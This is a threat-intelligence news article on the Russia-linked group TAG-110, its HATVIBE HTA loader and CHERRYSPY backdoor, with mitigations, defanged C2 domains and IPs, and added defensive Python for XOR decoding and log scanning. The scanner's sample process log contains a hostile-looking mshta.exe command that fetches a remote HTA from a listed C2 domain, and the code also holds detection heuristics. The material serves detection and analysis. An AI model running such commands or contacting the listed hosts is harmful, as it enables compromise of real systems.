TAG-110, a threat group linked to Russia, is conducting cyber-espionage operations against organizations in Central Asia, East Asia, and Europe.
Its primary targets are government bodies, NGOs, and academic institutions, against which it deploys custom malware such as HATVIBE and CHERRYSPY.
TAG-110's activity likely forms part of a broader Russian effort to maintain influence over former Soviet states and to gather intelligence on global political developments.
According to Recorded Future's Insikt Group, as of July 2024 a total of 62 victims had been documented across 11 countries, with the largest concentrations in Kyrgyzstan, Uzbekistan, and Kazakhstan.
Insight Into The TAG-110 Threat Group
TAG-110 overlaps with the publicly reported cluster UAC-0063, which CERT-UA attributes to BlueDelta (APT28) with "moderate confidence." Since at least 2021, TAG-110 has conducted intelligence-collection operations aligned with Russia's geopolitical interests.
Earlier reporting indicates that TAG-110 primarily targets entities in Central Asia, with additional targets in Israel, Ukraine, and Mongolia.
Researchers point to the group's use of the custom HATVIBE and CHERRYSPY tooling against these targets as part of the overlap with UAC-0063 and, through that cluster, the moderate-confidence association with BlueDelta (APT28).
HATVIBE
TAG-110 has used HATVIBE, a custom HTML Application (HTA) loader, since at least April 2023. Its primary function is to stage and execute additional malware, including the CHERRYSPY backdoor.
HATVIBE is delivered through malicious email attachments or by exploiting vulnerabilities in internet-facing services such as CVE-2024-23692 (a remote code execution flaw in Rejetto HTTP File Server).
Persistence is achieved with a scheduled task that launches the loader through mshta.exe. The loader is obfuscated with XOR encryption and VBScript encoding.
Once running, it reports basic system information to its command-and-control (C2) servers using HTTP PUT requests.
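The XOR layer mentioned above can usually be stripped without knowing the key in advance, because an HTA body contains predictable markers. The following is an added example, not code from the Insikt Group report or from HATVIBE itself. It assumes the simplest case, a single repeating key byte (the page does not state HATVIBE's actual scheme or key), and the HTA body, key, and marker strings are constructed for the demonstration.

```python
# Added example: known-plaintext recovery of a single-byte XOR key from an
# obfuscated HTA body. ASSUMPTION: a single repeating key byte; the real
# HATVIBE scheme and key are not stated in the article.
import string
from typing import Optional

# Constructed, harmless HTA skeleton standing in for a loader body.
SAMPLE_HTA = (
    '<html><head><script language="VBScript">\n'
    'MsgBox "constructed sample, not malware"\n'
    '</script></head></html>\n'
)
SAMPLE_KEY = 0x5A  # constructed key for the demonstration

# Markers that practically every HTA body contains; matched case-insensitively.
KNOWN_PLAINTEXT = (b"<script", b"<html", b"<hta:application")
PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (encoding and decoding are the same op)."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes) -> Optional[int]:
    """Try all 255 non-identity keys; accept the first that yields a known
    HTA marker and an almost entirely printable result."""
    if not blob:
        return None
    for key in range(1, 256):
        candidate = xor_bytes(blob, key)
        if not any(marker in candidate.lower() for marker in KNOWN_PLAINTEXT):
            continue
        printable_ratio = sum(b in PRINTABLE for b in candidate) / len(candidate)
        if printable_ratio > 0.95:
            return key
    return None


def decode_hta(blob: bytes) -> Optional[str]:
    """Recover the key and return the decoded HTA text, or None on failure."""
    key = recover_xor_key(blob)
    if key is None:
        return None
    return xor_bytes(blob, key).decode("latin-1")


if __name__ == "__main__":
    obfuscated = xor_bytes(SAMPLE_HTA.encode(), SAMPLE_KEY)
    print("recovered key: 0x%02x" % recover_xor_key(obfuscated))
    print(decode_hta(obfuscated))
```

The printable-ratio check matters: several keys can turn a marker into something that looks plausible when a blob is short, so an analyst should require both a marker hit and a mostly readable result before trusting a candidate key. Multi-byte keys need the same idea applied per key position.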
CHERRYSPY
Since April 2023, TAG-110 has also used CHERRYSPY, a custom Python backdoor, for espionage.
HATVIBE downloads CHERRYSPY and launches it with a Python interpreter. CHERRYSPY encrypts its C2 traffic using RSA and AES.
TAG-110 deploys CHERRYSPY mainly against government and research institutions to monitor victims' systems and exfiltrate sensitive data.
Mitigations
- Deploy network monitoring, intrusion detection, and intrusion prevention systems to flag traffic to the domains and IP addresses associated with TAG-110 (listed below).
- Use Snort, Suricata, and YARA rules to detect activity associated with HATVIBE and CHERRYSPY.
- Patch promptly to prevent exploitation of known vulnerabilities such as CVE-2024-23692.
- Train staff to recognize phishing attempts and enforce multi-factor authentication.
Indicators of Compromise
C2 Domains:
enrollmentdm[.]com
errorreporting[.]net
experience-improvement[.]com
game-wins[.]com
internalsecurity[.]us
lanmangraphics[.]com
retaildemo[.]info
shared-rss[.]info
telemetry-network[.]com
tieringservice[.]com
trust-certificate[.]net
C2 IP Addresses:
5.45.70[.]178
45.136.198[.]18
45.136.198[.]184
45.136.198[.]189
46.183.219[.]228
84.32.188[.]23
185.62.56[.]47
185.158.248[.]198
185.167.63[.]42
194.31.55[.]131
212.224.86[.]69
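As an added example that serves both the mitigation list and the indicator list above (it is not code from the article, from Recorded Future, or from any named tool), the script below refangs the indicators and runs them over constructed proxy and process-creation log lines, flagging HTTP PUT traffic to listed C2 hosts and mshta.exe launches that fit the scheduled-task persistence described for HATVIBE. The log layouts and field names, the heuristic that a scheduled task's child process has svchost.exe as its parent, and the user-writable path list are assumptions made for the demonstration.

```python
# Added example: match constructed log lines against the TAG-110 indicators
# and the mshta.exe / HTTP PUT tradecraft described in the article.
# ASSUMPTIONS: flattened key=value process events and a space-separated proxy
# log are illustrative formats; svchost.exe as parent is used as a heuristic
# for "started by the Task Scheduler service".
import ipaddress
import re
from typing import Dict, List

# Indicators copied from the article, kept in defanged form.
C2_DOMAINS = ("enrollmentdm[.]com", "errorreporting[.]net", "experience-improvement[.]com",
              "game-wins[.]com", "internalsecurity[.]us", "lanmangraphics[.]com",
              "retaildemo[.]info", "shared-rss[.]info", "telemetry-network[.]com",
              "tieringservice[.]com", "trust-certificate[.]net")
C2_IPS = ("5.45.70[.]178", "45.136.198[.]18", "45.136.198[.]184", "45.136.198[.]189",
          "46.183.219[.]228", "84.32.188[.]23", "185.62.56[.]47", "185.158.248[.]198",
          "185.167.63[.]42", "194.31.55[.]131", "212.224.86[.]69")


def refang(ioc: str) -> str:
    """'telemetry-network[.]com' -> 'telemetry-network.com'."""
    return ioc.replace("[.]", ".").strip().lower()


DOMAIN_SET = {refang(d) for d in C2_DOMAINS}
IP_SET = {ipaddress.ip_address(refang(i)) for i in C2_IPS}


def host_matches_ioc(host: str) -> bool:
    """True for a listed C2 IP, a listed domain, or any subdomain of one."""
    host = host.lower().rstrip(".")
    try:
        return ipaddress.ip_address(host) in IP_SET
    except ValueError:  # not an IP literal, compare as a domain
        return host in DOMAIN_SET or any(host.endswith("." + d) for d in DOMAIN_SET)


# Constructed proxy log: timestamp client method host path status
PROXY_LOG = [
    "2024-07-01T10:00:01Z 10.0.0.5 GET www.example.org / 200",
    "2024-07-01T10:00:07Z 10.0.0.5 PUT telemetry-network.com /upload 200",
    "2024-07-01T10:00:09Z 10.0.0.9 POST 45.136.198.184 /api 200",
    "2024-07-01T10:00:12Z 10.0.0.9 PUT cdn.shared-rss.info /x 200",
    "2024-07-01T10:00:15Z 10.0.0.7 GET internalsecurity.example /a 404",
]
PROXY_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")


def scan_proxy(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per request whose destination is a listed C2 host."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line.strip())
        if not m:
            continue
        ts, client, method, host, _path, _status = m.groups()
        if host_matches_ioc(host):
            reason = "destination is a listed TAG-110 C2 host"
            if method.upper() == "PUT":
                reason += "; HTTP PUT matches the HATVIBE check-in pattern"
            hits.append({"ts": ts, "client": client, "host": host, "reason": reason})
    return hits


# Constructed process-creation events (Sysmon-like fields flattened to key=value).
PROC_LOG = [
    r'Image=C:\Windows\System32\mshta.exe CommandLine="mshta.exe C:\Users\Public\update.hta" ParentImage=C:\Windows\System32\svchost.exe',
    r'Image=C:\Windows\System32\mshta.exe CommandLine="mshta.exe http://retaildemo.info/i.hta" ParentImage=C:\Windows\System32\svchost.exe',
    r'Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe readme.txt" ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\mshta.exe CommandLine="mshta.exe C:\Program Files\Vendor\help.hta" ParentImage=C:\Program Files\Vendor\app.exe',
]
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r'https?://([^/\s"]+)', re.IGNORECASE)
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")  # assumption


def scan_process_events(lines: List[str]) -> List[Dict[str, object]]:
    """Flag mshta.exe launches that look like HATVIBE persistence or staging."""
    hits = []
    for line in lines:
        ev = {k: v.strip('"') for k, v in KV_RE.findall(line)}
        if not ev.get("Image", "").lower().endswith("\\mshta.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        reasons = []
        if ev.get("ParentImage", "").lower().endswith("\\svchost.exe"):
            reasons.append("parent is svchost.exe (Task Scheduler host): scheduled-task launch")
        url = URL_RE.search(cmd)
        if url:
            reasons.append("mshta.exe given a remote HTA")
            if host_matches_ioc(url.group(1)):
                reasons.append("remote HTA host is a listed C2 domain")
        if any(p in cmd.lower() for p in USER_WRITABLE):
            reasons.append("HTA loaded from a user-writable path")
        if reasons:
            hits.append({"cmd": cmd, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy(PROXY_LOG) + scan_process_events(PROC_LOG):
        print(hit)
```

The subdomain check in host_matches_ioc is deliberate: a proxy log will usually show whatever hostname the client resolved, and an operator can front a listed apex domain with arbitrary subdomains. The fourth process event (an HTA under Program Files, started by a vendor application, no URL) is left unflagged to show that mshta.exe alone is not the signal; the parent, the path, and the destination are.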
The article ‘Russian TAG-110 Attacking Users With HATVIBE And CHERRYSPY Hacking Tools’ was originally seen on Cyber Security News.